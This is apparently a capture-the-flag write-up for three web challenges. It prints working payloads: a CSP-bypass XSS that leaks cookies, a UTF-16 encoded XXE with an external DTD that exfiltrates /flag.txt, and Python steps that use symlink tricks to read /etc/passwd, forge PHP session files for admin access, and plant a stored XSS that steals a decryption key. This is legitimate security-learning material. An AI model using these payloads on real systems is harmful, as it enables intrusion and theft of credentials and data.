Note: This write-up doesn’t explain all the steps. Feel free to email me at if you’re not sure how I got X.
1. Bad CSP rule:
2. Submit a post with the payload and report to admin:
<script src='""%2bdocument.cookie;a'></script>
3. Wait, and Got flag in /var/log/apache2/access.log:
CSP bypass(with JSONP) reference:
XXE payload:
XXE Waf bypass:
1. Create payload.xml:
<?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM ""> %sp; %param1; ]> <r>&exfil;</r>
2. Convert the file to bypass WAF:
cat payload.xml | iconv -f UTF-8 -t UTF-16BE > payload.xml
3. Host this dtd file(
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/flag.txt"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM ';'>">
4. Upload Payload.xml
5. Got base64 encoded flag in /var/log/apache2/access.log:
6. Base64 decode:
#Secure File Storage
(I failed to solve this challenge during the CTF, because I didn’t realize the bot can not visit HTTPS site. I change my payload from HTTPS to HTTP then I receive the Key. Sad 😢 )
0: Download the provide by the challenge, empty the main function.
1. Register account + Login + Get SessionID + Upload random file(ex: temp.txt)
username_tmp = "randomusername" password = "randompassword" api_register(username_tmp, password) api_login(username_tmp, password) sess_id_1 = session.cookies['PHPSESSID'] api_create_file("temp.txt", "aaa")
2. Symlink+read+edit => arbitrary file read/write
api_create_symlink("etc_passwd", "/../../../../../../etc/passwd") print(api_get_file('etc_passwd'))
3. Get all the source code from the server with symlink+read, review source code to gain more information.
api_create_symlink("web_file", "/../../../../../../var/www/html/index.php") print(api_get_file('web_file'))
Repeat for all files:
/var/www/html/* /var/www/html/views/*
4. Symlink tmp directory, current PHP session file. Edit session file to get admin privileges and list the tmp directory
api_create_symlink("tmp.txt", "/../../../../../../../../tmp/")
api_create_symlink("session.txt", "/../../../../../../../../tmp/sess_{}".format(sess_id_1))
Change privs to 15 to gain admin privileges, and list the /tmp directory:
api_update_file('session.txt', 'current_user|O:4:"User":4:{s:8:"username";s:14:"randomusername";
In postman:
5. symlink+read -> get encrypted flag.txt
After reading the source code, I know the flag path is: /tmp/user_data/1/flag.txt
api_create_symlink("flag.txt", "/../../../../../../../tmp/user_data/1/flag.txt")
6. Write a script to find the admin session file(in /tmp), the username in the session file will be ‘admin’.
The script should tell you the admin session file is: sess_4umud1lupqn0mpibor27r283o1
7. Symlink + edit modify admin session file, change the username to XSS payload.
api_create_symlink("admin_session", "/../../../../../../tmp/sess_4umud1lupqn0mpibor27r283o1") api_update_file('admin_session', 'current_user|O:4:"User":4:{s:8:"username";s:81:"<script> fetch( ''+localStorage.encryptSecret)</script>";s:8:"password";s:6 0:"$2y$10 $H38hS7IMk1MzSg/usdBvjuRucRGkEKrc/tJhJQOD7249oRpNqWc5O";s:5:"privs";s:2:"15";s:2:"id";s:1:"1";}')
my payload:
<script> fetch( ''+localStorage.encryptSecret)</script>
8. Wait for Admin visit the admin Page, and receive the decryption key:
localStorage.encryptSecret: wvEXTzNpd5xPostMnBqsqHzfz7Ns1yjqL9kwsuAx4ds=
9. Decrypt the Cipher(encrypted flag) with the Key to get the flag: